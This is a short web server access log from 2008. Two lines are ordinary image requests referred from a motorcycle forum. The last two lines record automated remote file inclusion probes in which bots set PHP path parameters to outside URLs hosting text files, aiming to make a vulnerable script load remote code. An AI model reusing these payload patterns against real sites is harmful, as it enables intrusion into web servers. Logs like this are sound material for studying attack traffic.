142.165.49.110 - - [21/Aug/2008:09:21:06 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 200 70821 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
142.165.49.110 - - [21/Aug/2008:09:21:07 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 200 63059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
74.54.89.50 - - [21/Aug/2008:09:21:14 -0700] "GET /logs/access_080519.log//include/admin.lib.inc.php?site_path=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.192.231.166 - - [21/Aug/2008:09:21:15 -0700] "GET /logs/access_080519.log//phpsecurityadmin/include/logout.php?PSA_PATH=ttp://yourtv.co.kr/Mboard/upload/main.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
